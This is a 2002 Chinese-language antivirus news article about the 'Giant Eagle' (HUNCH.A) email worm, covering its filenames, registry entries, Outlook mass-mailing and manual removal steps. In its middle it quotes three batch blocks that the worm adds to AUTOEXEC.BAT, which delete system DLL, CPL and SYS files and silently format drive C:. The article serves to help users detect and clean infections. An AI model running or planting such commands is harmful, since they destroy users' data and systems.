删除windows系统巨鹰病毒乍现网络

2002-09-04 11:33 来源：chinabyte 作者：李珂【网友评论0条查看】

近日，江民公司反病毒监测中心发现一名为"巨鹰"的蠕虫病毒，正在网上大面积传播扩散，该病毒具有极强的破坏性，它会在系统启动或者运行它的时候发作。

　　近日，江民公司反病毒监测中心发现一名为"巨鹰"的蠕虫病毒，正在网上大面积传播扩散，该病毒具有极强的破坏性，它会在系统启动或者运行它的时候发作，被该蠕虫破坏的症状有删除Windows、Program Files、My Documents目录以及子目录下的文件、格式化磁盘，需要MSVBVM60.DLL文件才能执行，运行时显示一张巨鹰的图片

　　该病毒别名：HUNCH.A, W32.Hunch@mm，大小：压缩后24,576 Bytes（用upx压缩），不压缩151,552 Bytes。有效系统：WINDOWS。语言：使用VB编写，具有加密特性。

　　该蠕虫可能会把自己拷贝几份留在系统目录下面，文件名可能是：
　　CORA.EXE
　　SALSA.EXE
　　MSWORD.EXE
　　LOCAS.EXE
　　LORY.EXE
　　DEJAS.EXE
　　SEXO.EXE
　　发作时至少删除和以下扩展名相同的五个文件
　　XLS
　　DOC
　　WAV
　　ASM
　　MPG
　　BAT
　　CDX
　　JPG
　　HTM
　　HLP
　　CHM
　　RPG
　　GIF
　　SCR
　　TTF
　　MID
　　MDB
　　DBF
　　ICO

　　用软盘的时候，蠕虫可能会用它自身的拷贝代替软盘上的文件。
　　该蠕虫会修改注册表，被感染的windows系统的注册表被修改可能有以下三种情况：
　　1：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
　　SALSA = "%SYSTEM%\SALSA.EXE"
　　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
　　SALSA = "%SYSTEM%\SALSA.EXE"
　　2：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
　　DEJAS="C:\WINDOWS\SYSTEM\DEJAS.EXE"
　　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
　　DEJAS="C:\WINDOWS\SYSTEM\DEJAS.EXE"
　　3：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
　　LOCAS="C:\WINDOWS\SYSTEM\LOCAS.EXE"
　　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
　　LOCAS="C:\WINDOWS\SYSTEM\LOCAS.EXE"

　　把下面三段命令中的任一段加到C:\AUTOEXEC.BAT，在系统启动时删除重要文件并且自动格式化C盘：
　　1．@echo off
　　DEL %System%\*.CPL
　　DEL %System%\*.DLL
　　DEL %System%\*.OCX
　　CLS
　　FORMAT C: /u /v:SALSA /autotest
　　2．@echo off
　　DEL %System%\*.SYS
　　DEL %System%\*.LOG
　　DEL %System%\*.OCX
　　CLS
　　FORMAT C: /u /v:DEJAS /autotest
　　3．@echo off
　　DEL %System%\*.CPL
　　DEL %System%\*.DLL
　　DEL %System%\*.DRV
　　CLS
　　FORMAT C: /u /v:LOCAS /autotest

　　已经被感染的系统，正在运行的进程列表中会存在dejas，locas，salsa这三个进程。而且蠕虫会通过MAPI把自身发送给MS Outlook地址薄中的所有联系人。

　　该邮件的特征：
　　主题：空
　　正文：Mensaje importante para <收件人> en el archivo adjunto
　　附件：蠕虫自身的拷贝

　　清除步骤：
　　1．从内存中终止正在运行的蠕虫进程
　　按CTR+ALT+DEL打开WINDOWS的任务管理器，从进程列表选择dejas，locas，salsa，然后单击[结束进程]。
　　2．删除注册表中自动运行的入口
　　打开注册表删除HKEY_LOCAL_MACHINE>Software>Microsoft>Windows> CurrentVersion>Run和HKEY_LOCAL_MACHINE>Software>Microsoft>Windows> CurrentVersion>RunServices中的DEJAS，LOCAS，SALSA三项。
　　3．修改AUTOEXECUTE.BAT文件
　　打开文件删除带有@echo off ， DEL ，CLS和FORMAT C:的行。
　　4．删除LISTWIN.TXT和WINLIST.TXT两个文件，这两个文件记录了被蠕虫删除的文件列表，存放在系统目录里边，如果是WIN9X/ME目录为C:\Windows\System，如果是WIN NT/2000/XP目录为C:\Windows\System32。
　　5．运行KV3000杀毒王进行系统扫描，把发现有WORM_HUNCH.A.的文件删除。